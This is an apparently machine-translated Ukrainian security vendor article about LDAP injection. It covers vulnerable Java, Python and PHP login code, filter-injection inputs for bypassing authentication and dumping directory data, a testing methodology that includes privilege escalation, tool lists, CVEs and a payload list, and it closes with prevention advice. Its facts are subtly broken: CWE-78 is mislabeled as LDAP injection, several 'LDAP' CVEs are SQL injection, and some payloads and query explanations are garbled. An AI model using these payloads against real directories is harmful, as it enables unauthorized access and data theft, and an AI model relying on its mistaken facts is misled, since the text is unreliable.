10 Бер, 2023

Впровадження коду через LDAP запити

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

LDAP (полегшений протокол доступу до каталогів) це протокол, який використовується для доступу до інформації каталогу та управління нею. Впровадження коду через LDAP запити відноситься до уразливості в системі безпеки, при якій зловмисник може впровадити шкідливий код в запит LDAP, який потім може бути виконаний додатком, що використовує запит.

Шкідливий код може бути використаний для виконання різних атак, включаючи крадіжку конфіденційних даних, змінення та видалення даних або отримання несанкціонованого доступу до систем. Впровадження коду з допомогою запитів LDAP може статися, коли додаток неправильно перевіряє дані, що вводяться користувачем перед створенням запиту LDAP.

Приклад уразливого коду на різних мовах програмування:


В Java:

				
					String query = "(&(uid=" + userInput + ")(userPassword=" + password + "))";
NamingEnumeration<SearchResult> results = ctx.search("dc=mydomain,dc=com", query, null);

				
			


Цей Java-код створює запит LDAP з використанням інтерфейсу вводу без його перевірки або очищення, що може призвести до впровадження коду.

• в Python:

				
					import ldap

userInput = input("Enter a username: ")
password = input("Enter a password: ")

ldap_conn = ldap.initialize('ldap://localhost')
ldap_conn.simple_bind_s("uid=" + userInput + ",dc=mydomain,dc=com", password)

				
			


Цей код на Python створює прив'язку LDAP з використанням інтерфейсу вводу без його перевірки або очищення, що може призвести до впровадження коду.

• В PHP:

				
					$userInput = $_POST['username'];
$password = $_POST['password'];

$ldapconn = ldap_connect("ldap://localhost");
$ldapbind = ldap_bind($ldapconn, "uid=" . $userInput . ",dc=mydomain,dc=com", $password);

				
			


Цей PHP-код створює прив'язку LDAP з використанням інтерфейсу вводу без його перевірки або очищення, що може призвести до впровадження коду.

Приклади впровадження коду експлуатації через LDAP запити

Крадіжка даних

Зловмисник може впровадити код запит LDAP, щоб вкрасти конфіденційні дані з каталогу LDAP, такі як імена користувачів і паролі.

				
					Input: username=*)(uid=*))(|(uid=*
Query: (&(uid=*)(uid=*))(|(uid=*))(userPassword=*)

				
			


У цьому прикладі зловмисник вводить *)(uid=*))(|(uid=* у полі ім'я користувача, яке викликає запит LDAP для пошуку всіх записів з пустим ім'ям користувача і будь-яким паролем.

Зміна даних

Зловмисник може впровадити код запит LDAP для зміни або видалення даних у каталозі LDAP, таких як інформація про облікового запису користувача.

				
					Input: username=jdoe)(|(uid=*)(userPassword=*)
Query: (&(uid=jdoe)(|(uid=*)(userPassword=*)))(&(!(|(userPassword=*))(userPassword=*))(uid=*))

				
			


У цьому прикладі зловмисник вводить )(|(uid=*)(userPassword=* у полі ім'я користувача, яке викликає запит LDAP для пошуку всіх записів з іменем користувача "jdoe" або будь-яким паролем, а потім змінює або видаляє інформацію облікового запису користувача.

Отримання несанкціонованого доступу

Зловмисник може впровадити код запит LDAP, щоб отримати несанкціонований доступ до системи, минаючи автентифікації.

				
					Input: username=*)(uid=*))(|(uid=*
Query: (&(uid=*)(uid=*))(|(uid=*))(userPassword=*)

				
			


У цьому прикладі зловмисник вводить *)(uid=*))(|(uid=* у полі ім'я користувача, яке змушує запит LDAP шукати всі записи з пустим ім'ям користувача і будь-яким паролем, ефективно минаючи перевірку автентичності. Потім зловмисник може отримати несанкціонований доступ до системи.

Методи підвищення привілеїв для впровадження коду через LDAP запити

Зловживання адміністративними Привілеями

Якщо зловмисник може впровадити код запит LDAP і змінити інформацію каталогу LDAP, він може підвищити свої привілеї, створивши новий обліковий запис користувача з правами адміністратора або змінивши привілеї облікового запису користувача.

Використання інших Вразливостей

Якщо зловмисник здатний впровадити код запит LDAP, він може використовувати інші уразливості в системі для підвищення своїх привілеїв. Наприклад, вони можуть використовувати уразливість локального підвищення привілеїв, щоб отримати доступ до кореневої системи.

Компрометація інших облікових записів

Якщо зловмисник здатний впровадити код запит LDAP і отримати інформацію про обліковий запис користувача, він може використовувати цю інформацію для компрометації інших облікових записів в системі або в інших системах в мережі.

Атаки грубої силою

Якщо зловмисник здатний впровадити код запит LDAP і отримати інформацію про обліковий запис користувача, він може використовувати цю інформацію для виконання атаки методом перебору паролів користувачів, що може дозволити їм отримати доступ до додаткових облікових записів і підвищити свої привілеї.

Загальна методологія та контрольний список для впровадження коду через LDAP запити

Методологія:

  1. Визначте LDAP запити, використовувані програмою, і будь користувальницький введення, що використовується у цих запитах.

  2. Спробуйте ввести код в запит LDAP, ввівши вхідні дані, які включають спеціальні символи або інші кодові конструкції, які можуть бути інтерпретовані як код. Наприклад, спробуйте ввести крапку з комою (;), апостроф (') або роздільник коментарів (/*), щоб побачити, чи обробляє додаток код належним чином.

  3. Використовувати такий інструмент, як LDAP Injection Tool (LdapMiner) або OWASP ZAP, для автоматичної перевірки вразливостей при впровадженні коду. Ці інструменти можуть бути використані для створення різних тестових прикладів для виявлення потенційних вразливостей в додатку.

  4. Проаналізуйте реакцію програми на введений код, щоб визначити, чи код успішно виконаний або спостерігалися будь-які повідомлення про помилки або інша незвичайна поведінка.

  5. Якщо виявлена уразливість, спробуйте підвищити привілеї, змінивши або видаливши інформацію каталогу LDAP або використовуючи уразливість для несанкціонованого доступу до системи.

  6. Документуйте і повідомляйте про будь-які виявлені вразливості розробникам додатків або групі безпеки.

  7. Переконайтеся, що уразливості були виправлені, повторно протестувавши додаток після внесення будь-яких змін.

Контрольний список:

  1. Визначте LDAP запити, використовувані програмою, і будь користувальницький введення, що використовується у цих запитах.

  2. Перевірте поля користувальницького введення, ввівши спеціальні символи, такі як апострофи, крапки з комою або лапки, щоб переконатися, що програма обробляє їх правильно.

  3. Перевірте уразливості при впровадженні LDAP, ввівши вхідні дані, що містять спеціальні символи LDAP, такі як круглі дужки, зірочки або амперсанди, і перевірте, інтерпретує додаток вхідні дані як код.

  4. Використовуйте інструменти для перевірки вразливостей при впровадженні LDAP, такі як ZAP від OWASP або LdapMiner.

  5. Перевірте, чи немає повідомлень про помилки або іншого незвичайного поведінки, що може вказувати на успішну атаку з впровадженням LDAP.

  6. Спробуйте підвищити привілеї, змінивши або видаливши інформацію каталогу LDAP або використовуючи уразливість для несанкціонованого доступу до системи.

  7. Документуйте і повідомляйте про будь-які виявлені вразливості розробникам додатків або групі безпеки.

  8. Переконайтеся, що уразливості були виправлені, повторно протестувавши додаток після внесення будь-яких змін.

  9. Вбудуйте перевірку вхідних даних і очищення, щоб запобігти майбутні уразливості при впровадженні LDAP.

  10. Навчіть розробників методам безпечного кодування, щоб запобігти майбутні уразливості при впровадженні LDAP.

Набір інструментів для експлуатації Впровадження коду через LDAP запити

Ручні Інструменти:

  • LDAP Injection Tool: Це ручний інструмент, який можна використовувати для перевірки вразливостей при впровадженні LDAP, вводячи спеціальні символи LDAP в поля введення, щоб побачити, інтерпретує додаток їх як код.

  • Ldapsearch: Це інструмент командного рядка, який можна використовувати для пошуку інформації в каталозі LDAP і для перевірки вразливостей при впровадженні LDAP.

  • Burp Suite: Це інструмент тестування безпеки веб-додатків, який включає в себе безліч модулів тестування, включаючи модуль для тестування вразливостей при впровадженні LDAP.

  • Metasploit: Це інструмент тестування на проникнення, який може бути використаний для перевірки на наявність різних вразливостей, включаючи уразливості при впровадженні LDAP.

  • Nmap: Це інструмент відображення мережі, який можна використовувати для ідентифікації серверів LDAP і інших мережевих ресурсів, які можуть бути уразливі для атак з використанням LDAP-ін'єкцій.

  • Wireshark: Це аналізатор мережевих протоколів, який може використовуватися для збору і аналізу мережевого трафіку, включаючи запити і відповіді LDAP.

  • ldapdomaindump: Це інструмент командного рядка, який можна використовувати для отримання інформації про домен з сервера LDAP, що може бути корисно при виявленні потенційних цілей для атак з використанням LDAP-ін'єкцій.

  • ldapcp: Це інструмент, який може бути використаний для копіювання інформації каталогу LDAP з одного сервера на інший, що може бути корисно при проведенні цільових атак з використанням LDAP-ін'єкцій.

Автоматизовані інструменти:

  • OWASP ZAP: Це інструмент тестування безпеки веб-додатків з відкритим вихідним кодом, що включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • Acunetix: Це інструмент тестування безпеки веб-додатків, який включає в себе безліч модулів тестування, включаючи модуль для тестування вразливостей при впровадженні LDAP.

  • Netsparker: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • AppSpider: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • Arachni: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • SQLMap: Це інструмент тестування на проникнення, який можна використовувати для перевірки вразливостей SQL-ін'єкцій, які можуть використовуватися для використання вразливостей LDAP-ін'єкцій.

  • Wapiti: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • Skipfish: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • Nikto: Це сканер веб-сервера, який може бути використаний для виявлення потенційних вразливостей при впровадженні LDAP.

  • Nessus: Це сканер вразливостей, який може бути використаний для виявлення потенційних вразливостей при впровадженні LDAP.

  • Qualys: Це хмарний інструмент управління уразливими, який можна використовувати для виявлення потенційних вразливостей при впровадженні LDAP.

  • Retina: Це інструмент управління уразливими, який може бути використаний для виявлення потенційних вразливостей при впровадженні LDAP.

  • Security Onion: Це платформа моніторингу безпеки на базі Linux, яка включає в себе безліч інструментів тестування і аналізу безпеки, включаючи інструменти для тестування вразливостей при впровадженні LDAP.

  • Grendel-Scan: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

  • IronWASP: Це інструмент тестування безпеки веб-додатків, який включає в себе модуль для тестування вразливостей при впровадженні LDAP.

Середній бал CVSS впровадження стекового коду через LDAP запити

Загальна система оцінки вразливостей (CVSS) являє собою стандартизовану систему для оцінки серйозності вразливостей в системі безпеки. Оцінка варіюється від 0 до 10, причому 10 балів є найсерйознішими. Оцінка CVSS визначається на основі декількох факторів, включаючи потенційний вплив уразливості, ймовірність використання та складність атаки.

Оцінка CVSS для стека, що включає впровадження коду через LDAP запити, може сильно варіюватися в залежності від конкретної уразливості і її впливу. Однак, як правило, цей тип вразливості вважається высокосерьезным, оскільки він потенційно може дозволити зловмиснику отримати несанкціонований доступ до конфіденційних даних або систем.

Середній бал CVSS для стека, що включає впровадження коду через запити до LDAP, буде залежати від декількох факторів, таких як складність програми, серйозність уразливості і рівень доступу, наданий сервером LDAP. Однак багато такі уразливості, ймовірно, будуть мати оцінку CVSS в діапазоні від 7 до 9, що вказує на вразливість високого ступеня серйозності.

Загальна перерахування слабких місць (CWE)

• CWE-78: Неправильна нейтралізація спеціальних елементів, використовуваних у запиті LDAP ('Впровадження LDAP') – Цей CWE конкретно пов'язаний з уразливими при впровадженні LDAP.

• CWE-89: Неправильна нейтралізація спеціальних елементів, використовуваних в команді SQL ('SQL-ін'єкція') – Хоча це не відноситься конкретно до вразливостей при впровадженні LDAP, це CWE пов'язано з тим, що SQL-ін'єкція інколи може використовуватися для використання вразливостей при впровадженні LDAP.

• CWE-22: Неправильне обмеження імені шляху до закритого каталогу ('Path Traversal') – Цей CWE пов'язаний з тим, що запити LDAP іноді можуть використовуватися для виконання атак з обходом шляху.

• CWE-434: Необмежена завантаження файлу з небезпечним типом – це CWE пов'язано, тому що іноді його можна використовувати для завантаження файлу, що містить код впровадження LDAP.

• CWE-352: Підробка міжсайтових запитів (CSRF) – Це CWE пов'язано з тим, що CSRF атаки іноді можуть використовуватися для виконання атак з використанням LDAP-ін'єкцій.

• CWE-601: Перенаправлення URL на ненадійний сайт ('Open Redirect') – Цей CWE пов'язаний, тому що іноді його можна використовувати для перенаправлення користувача на сайт, який виконує атаку з використанням LDAP-ін'єкції.

• CWE-79: Неправильна нейтралізація вводу під час генерації веб-сторінки ('Міжсайтовий скриптінг') – Цей CWE пов'язаний з тим, що уразливості міжсайтового скриптинга іноді можуть використовуватися для виконання атак з використанням LDAP-ін'єкцій.

• CWE-200: Передача конфіденційної інформації неавторизованого суб'єкту – цей CWE пов'язаний з тим, що атаки з використанням LDAP-ін'єкцій іноді можуть використовуватися для розкриття конфіденційної інформації.

• CWE-306: відсутній аутентифікація для критичної функції – це CWE пов'язаний з тим, що відсутність аутентифікації інколи може використовуватися для виконання атак з використанням LDAP-ін'єкцій.

• CWE-319: Передача конфіденційної інформації відкритим текстом – цей CWE пов'язаний, тому що він може дозволити зловмиснику перехоплювати запити і відповіді LDAP, потенційно розкриваючи конфіденційну інформацію.

Топ-10 CVE, пов'язаних з впровадженням коду через LDAP запити

• CVE-2023-26033 – Gentoo soko - це код, який управляє packages.gentoo.org . Версії до 1.0.1 уразливі для впровадження SQL, що призводить до відмови в обслуговуванні. Якщо користувач вибирає (в налаштуваннях користувача) подання "Нещодавно відвідані пакети" для індексного сторінки, значення cookie `search_history` використовується в якості списку атомів в кодуванні base64, розділеного комами. Це рядок, завантажена безпосередньо в SQL-запит з рядком формату `atom = '%s'. В результаті, будь-який користувач може змінити значення cookie-файлу браузера та ввести більшість SQL-запитів. Як доказ концепції був згенерований спотворений файл cookie, який видалив базу даних або змінив її вміст. В базі даних зберігаються тільки загальнодоступні дані, тому у користувачів сайту немає проблем з конфіденційністю. Якщо відомо, що база даних була змінена, повне відновлення даних можливо шляхом виконання повного очищення бази даних і виконання повного оновлення всіх компонентів. Ця проблема вирішується з ідентифікатором фіксації 5ae9ca83b73. Версія 1.0.1 містить патч. Якщо користувачі не можуть виконати оновлення негайно, можуть бути застосовані наступні обхідні шляхи: (1.) Використовуйте проксі, щоб завжди видаляти cookie `search_history` до оновлення. Вплив на користувальницький досвід невелика. (2.) Очистіть файл cookie `search_history` до значення після його декодування base64.

• CVE-2023-25719  – Управління ConnectWise до 22.9.10032 (раніше відоме як ScreenConnect) не дозволяє перевірити надані користувачем параметри, такі як Bin / ConnectWiseControl.Client.exe параметр h. Це призводить до відображення даних та впровадження шкідливого коду у виконуваний файл завантажений. Виконуваний файл може використовуватися для виконання шкідливих запитів або в якості вектора відмови в обслуговуванні. ПРИМІТКА: ця запис CVE стосується лише параметрів, таких як параметр h (ця запис CVE не стосується окремої проблеми підписаних виконуваних файлів, які, як передбачається, мають унікальні конфігурації в установках клієнтів).

• CVE-2023-0895 – Плагін WP Coder – add custom html, css і js code для WordPress вразливий для SQL-ін'єкції на основі часу за допомогою параметра 'id' у версіях 2.5.3 включно з-за недостатнього екранування користувацьких настройок і відсутності достатньої підготовки до існуючого SQL-запитом. Це дозволяє пройшов перевірку автентичності зловмисникам з правами адміністратора додавати додаткові SQL-запити до вже існуючим запитам, які можуть бути використані для отримання конфіденційної інформації з бази даних.

• CVE-2022-45910 – Неправильна нейтралізація спеціальних елементів, використовуваних у запиті LDAP ("Впровадження LDAP") уразливість в з'єднувачах повноважень ActiveDirectory і Sharepoint ActiveDirectory Apache ManifoldCF дозволяє зловмисникові маніпулювати пошуковими запитами LDAP (DoS, додаткові запити, маніпуляції з фільтрами) під час пошуку користувача, якщо ім'я користувача або рядок домену передаються в сервлет UserACLs без перевірки. Ця проблема зачіпає Apache ManifoldCF версії 2.23 і більш ранніх версій.

• CVE-2022-40145 – Ця вразливість пов'язана з потенційним впровадженням коду, коли зловмисник контролює сервер LDAP, використовуючи URL-адресу JDBC JNDI. Функція jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource використовує InitialContext.lookup(jndiName) без фільтрації. Користувач може змінити `options.put(JDBCUtils.ДЖЕРЕЛО ДАНИХ, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.ДЖЕРЕЛО ДАНИХ, "jndi: rmi://x.x.x.x:xxxx/Command);` в JdbcLoginModuleTest#налаштування. Це вразливе для атаки віддаленого виконання коду (RCE), коли конфігурація використовує URI даних JNDI LDAP, коли зловмисник контролює сервер LDAP.Ця проблема зачіпає всі версії Apache Karaf аж до 4.4.1 і 4.3.7. Ми рекомендуємо користувачам оновитися до Apache Karaf як мінімум до 4.4.2 або 4.3.8

• CVE-2021-43035 – У пристрої резервного копіювання Kaseya Unitrends, випущеному до версії 10.5.5, була виявлена проблема. Були виявлені дві уразливості при впровадженні SQL без автентифікації, що дозволяють вводити довільні SQL-запити і виконувати їх під обліковим записом адміністратора postgres. Стало можливим віддалене виконання коду, що призвело до повного доступу до облікового запису користувача postgres.

• CVE-2021-37933 – Вразливість впровадження LDAP /account/login в Huntflow Enterprise до версії 3.10.6 могла дозволити віддаленому користувачеві, який не пройшов перевірку автентичності, змінювати логіку запиту LDAP та обходили аутентифікацію. Уразливість пов'язана з недостатньою перевіркою параметра електронної пошти на стороні сервера перед використанням його для побудови запитів LDAP. Зловмисник може обійти аутентифікацію, використовуючи цю уразливість, відправивши спроби входу в систему, в яких зазначено дійсний пароль, але знак підстановки в параметрі електронної пошти.

• CVE-2021-32651 – OneDev - це платформа для розробки. Якщо механізм зовнішньої аутентифікації LDAP включений у версіях OneDev 4.4.1 і більш ранніх, зловмисник може маніпулювати користувальницьким фільтр пошуку для відправки підроблених запитів в додаток і досліджувати дерево LDAP, використовуючи методи сліпого впровадження LDAP. Конкретна корисне навантаження залежить від того, як налаштована властивість Фільтр пошуку користувача в OneDev. Ця проблема була виправлена у версії 4.4.2.

• CVE-2021-3027 – app/views_mod/user/user.py у LibrIT PaSSHport через 2.5 залежить від впровадження LDAP. Витік інформації відбувається через створення спеціальних запитів, які обходять передбачений фільтр пошуку, оскільки користувальницький введення не піддається санітарній обробці.

• CVE-2020-7356 – CAYIN xPost страждає від вразливості при впровадженні SQL-коду без автентифікації. Вхідні дані, що передаються через параметр GET 'wayfinder_seqid' в wayfinder_meeting_input.jsp, не обробляються належним чином перед поверненням користувачеві або використанням в SQL-запитах. Це може бути використано для управління SQL-запитів шляхом введення довільного SQL-коду і виконання СИСТЕМНИХ команд.

Впровадження коду через LDAP запити подвиги

  • LАтака ін'єкцією DAP: Це найбільш поширений тип атаки, який використовує уразливості при впровадженні LDAP запитів. Зловмисники можуть маніпулювати запитів LDAP для впровадження шкідливого коду, який потім виконується на сервері LDAP.

  • Обхід аутентифікації: Зловмисники можуть використовувати впровадження LDAP для обходу аутентифікації і отримання доступу до обмежених областей додатка або мережі.

  • Эксфильтрация даних: Зловмисники можуть використовувати впровадження LDAP для отримання конфіденційних даних з сервера LDAP, таких як облікові дані користувача або інша конфіденційна інформація.

  • Підвищення привілеїв: Зловмисники можуть використовувати впровадження LDAP для підвищення своїх привілеїв і отримання адміністративного доступу до сервера LDAP або інших мережевих ресурсів.

  • Відмова в обслуговуванні (DoS): Зловмисники можуть використовувати впровадження LDAP, щоб завалити LDAP-сервер запитами, в результаті чого він вийде з ладу або перестане відповідати.

  • Віддалене виконання коду (RCE): В деяких випадках проблеми, пов'язані з впровадженням LDAP, можуть дозволити зловмисникам виконувати довільний код на сервері LDAP, що потенційно може призвести до повної компрометації системи.

  • Перерахування облікових записів: Зловмисники можуть використовувати впровадження LDAP для визначення дійсних облікових записів користувачів на сервері LDAP, які потім можуть бути використані для подальших атак.

  • Перерахування груп: Зловмисники можуть використовувати впровадження LDAP, щоб визначити, які користувачі належать до певних груп на сервері LDAP, що може допомогти в подальших атаках.

  • Перерахування серверів: Зловмисники можуть використовувати впровадження LDAP для збору інформації про сервер LDAP і його конфігурації, яка може бути корисна для планування подальших атак.

  • Витяг хеш пароля: Зловмисники можуть використовувати впровадження LDAP для вилучення хешей паролів з сервера LDAP, які можуть бути використані для запуску автономних атак з метою взлому паролів.

Практикуючись в тестуванні на Впровадження коду через LDAP запити

Створення уразливого додатка: Ви можете створити вразливе веб-додаток, схильна до атак з використанням LDAP-ін'єкцій, а потім спробувати використовувати його за допомогою різних інструментів і методів.

Використання уразливого додатка: В Інтернеті є безліч вразливих веб-додатків, які ви можете використовувати для практичного тестування вразливостей при впровадженні LDAP, таких як Чертовски вразливе веб-додаток (DVWA).

Приєднуйтесь до події Capture the Flag (CTF): Багато події CTF включають проблеми, пов'язані з безпекою веб-додатків, включаючи уразливості при впровадженні LDAP. Участь в цих заходах може допомогти вам розвинути свої навички та отримати досвід в тестуванні на наявність цих типів вразливостей.

Використовуйте інструменти тестування: Доступно безліч інструментів тестування, які можуть допомогти вам виявити і використовувати уразливості при впровадженні LDAP, такі як Burp Suite, OWASP ZAP і SQLMap. Ви можете використовувати ці інструменти, щоб попрактикуватися у виявленні і використанні вразливостей в контрольованому середовищі.

Читайте і виконуйте навчальними посібниками: В Інтернеті є безліч посібників, у яких міститься покрокове керівництво по виявленню і використанню вразливостей, пов'язаних з впровадженням LDAP. Дотримання цих порад допоможе вам розвинути свої навички і краще зрозуміти, як працюють ці типи вразливостей.

Відвідувати навчальні курси: Доступно безліч навчальних курсів, присвячених безпеки веб-додатків і, зокрема, тестування вразливостей при впровадженні LDAP. Відвідування цих курсів може допомогти вам глибше зрозуміти ці типи вразливостей і отримати практичний досвід у їх тестуванні.

Для вивчення впровадження коду через LDAP запити

Впровадження OWASP LDAP: OWASP надає детальний огляд атак з використанням LDAP-ін'єкцій, включаючи різні типи атак, як вони працюють і як їх запобігти.

Шпаргалка для ін'єкцій LDAP: Ця шпаргалка містить короткий довідковий посібник по виявленню і запобіганню вразливостей при впровадженні LDAP.

Тестування впровадження LDAP: У цій статті представлено покрокове керівництво по тестуванню вразливостей при впровадженні LDAP, включаючи використання різних інструментів і технік.

Академія веб–безпеки - Впровадження LDAP: Академія веб-безпеки надає безкоштовний онлайн-курс по впровадженню LDAP, у тому числі щодо виявлення та використання вразливостей при впровадженні LDAP.

Впровадження коду через Впровадження LDAP: У цій статті представлений огляд того, як впровадження коду може бути досягнуто з допомогою вразливостей для впровадження LDAP.

Корисні навантаження для впровадження LDAP: Цей ресурс надає список корисних навантажень для впровадження LDAP, які можна використовувати для перевірки на наявність вразливостей.

Лабораторія ін'єкцій LDAP: Ця лабораторія надає практичний досвід тестування вразливостей при впровадженні LDAP, включаючи використання таких інструментів, як Burp Suite і SQLMap.

Демонстрація впровадження LDAP: Ця демонстрація забезпечує наочну демонстрацію того, як атаки з використанням LDAP-ін'єкцій можуть використовуватися для отримання конфіденційних даних з сервера LDAP.

Шпаргалка по запобіганню ін'єкцій LDAP: Ця шпаргалка містить короткий довідковий посібник із запобігання вразливостей при впровадженні LDAP.

Виявлення уразливості при впровадженні LDAP: У цій статті представлений огляд того, як виявити уразливості при впровадженні LDAP з використанням різних методів тестування.

Книги з оглядом впровадження коду через LDAP запити

"Адміністрування системи LDAP" автор: Джеральд Картер: Ця книга являє собою введення в LDAP і охоплює такі теми, як моделювання даних LDAP, безпека і мережеві служби на основі LDAP.

"Програмування, управління та інтеграція LDAP" автор: Клейтон Донлі: У цій книзі розглядаються основи LDAP, в тому числі те, як використовувати його для аутентифікації, авторизації і служб каталогів.

"Пояснені каталогів LDAP: введення і аналіз" Брайан Аркиллс: У цій книзі дається огляд каталогів LDAP і того, як вони працюють, в тому числі як використовувати їх для аутентифікації та авторизації.

"LDAP для вчених-ракетників" автор Енді Батчер: У цій книзі дається детальний огляд LDAP, включаючи те, як використовувати його для аутентифікації, авторизації і служб каталогів.

"Розуміння і розгортання служб каталогів LDAP" автор Тімоті А. Хоус: У цій книзі розглядаються основи LDAP, в тому числі те, як використовувати його для аутентифікації, авторизації і служб каталогів.

"Освоєння OpenLDAP" Метт Батчер: У цій книзі дається детальний огляд OpenLDAP, в тому числі про те, як використовувати його для аутентифікації, авторизації і служб каталогів.

"Методологія надання метаданих LDAP: покроковий метод реалізації надання метаданих на основі LDAP" автор Метью Ньюман: У цій книзі розглядається методологія надання доступу до метаданих LDAP і наводиться покрокове керівництво по впровадженню надання доступу до метаданих на основі LDAP.

"Керівництво адміністратора LDAP" автор: Джеральд Картер: У цій книзі дається детальний огляд адміністрування LDAP, включаючи те, як налаштовувати і підтримувати каталогів LDAP.

"Розуміння LDAP" Девід Футчер: Ця книга являє собою введення в LDAP, в тому числі про те, як використовувати його для аутентифікації, авторизації і служб каталогів.

"Програмування LDAP за допомогою Java" автор: Роб Уэлтман: Ця книга являє собою введення в програмування LDAP з використанням Java, в тому числі про те, як використовувати його для аутентифікації, авторизації і служб каталогів.

Список корисних навантажень Впровадження коду через LDAP запити

  • *()|{0}| торкніться +/tmp/ldap_injection
  • *()|&{0}|echo+"LDAP+ Ін'єкція"+>+/tmp/ldap_injection
  • *)(uid=*))(|(uid=*))
  • *)(cn=*))(|(cn=*))
  • *)(Пароль користувача=*)) (|Пароль користувача=*))
  • *)(Клас об'єкта=*))(|(Клас об'єкта=*))
  • *)(|(uid=*
  • *)(|(cn=*
  • *()|&{0}|echo+"LDAP+ Ін'єкція"+>+/tmp/ldap_injection
  • *)(uid=*));(uid=*))

Як бути захищеним від впровадження коду з допомогою запитів LDAP

  1. Перевірка вхідних даних: Переконайтеся, що весь користувальницький введення перевірений і очищений, перш ніж він буде використаний в будь-яких запитів LDAP.

  2. Використовуйте параметризрвані запити: Використовуйте параметризрвані запити або підготовлені інструкції, щоб зловмисники не могли вставляти шкідливий код запити.

  3. Доступ з найменшими привілеями: Використовуйте принцип найменших привілеїв, коли облікових записів користувачів надаються тільки ті дозволи, які необхідні для виконання призначених їм завдань.

  4. Регулярне латання: Підтримуйте все програмне забезпечення та додатки в актуальному стані з допомогою останніх виправлень і оновлень безпеки.

  5. Брандмауер і сегментація мережі: Використовуйте брандмауери і сегментацію мережі, щоб ізолювати сервери LDAP від інших систем в мережі.

  6. Шифрування: Використовуйте шифрування, таке як SSL / TLS, для захисту конфіденційних даних, переданих по мережі.

  7. Аутентифікація: Вбудуйте заходи суворої аутентифікації, такі як багатофакторна аутентифікація, для запобігання несанкціонованого доступу до серверів LDAP.

  8. Моніторинг: Контролюйте сервери LDAP на предмет підозрілої активності і впроваджуйте системи виявлення та запобігання вторгнень.

  9. Тестування безпеки: Регулярно проводите тестування безпеки, таке як сканування вразливостей і тестування на проникнення, щоб виявити і усунути будь-які уразливості.

  10. Фільтрація вхідних даних: Реалізуйте фільтрацію вхідних даних, щоб блокувати виконання будь-яких підозрілих символів або команд для запитів LDAP.

Висновок

Впровадження коду через LDAP запити це серйозна уразливість в системі безпеки, яка може дозволити зловмисникам виконувати довільний код у вразливих системах. Це може статися, коли користувальницький введення не був належним чином перевірений або очищений перед використанням для запитів LDAP. Зловмисники можуть скористатися цією вразливістю, щоб впровадити шкідливий код в LDAP запити і потенційно отримати несанкціонований доступ до конфіденційних даних або оволодіти системою.

Щоб запобігти впровадження коду через LDAP запити, важливо реалізувати перевірку вхідних даних, параметризрвані запити, доступ з найменшими привілеями, регулярне виправлення, сегментацію брандмауера і мережі, шифрування, суворі заходи аутентифікації, моніторинг та тестування безпеки. Крім того, фільтрація вхідних даних може допомогти заблокувати виконання будь-яких підозрілих символів або команд в рамках LDAP запитів.

Організаціям слід вживати попереджувальні кроки для захисту від впровадження коду з допомогою запитів LDAP і регулярно оцінювати свої системи на предмет уразливостей. Поступаючи таким чином, вони можуть допомогти забезпечити безпеку і цілісність своїх систем і даних.

Інші Послуги

Готові до безпеки?

зв'язатися з нами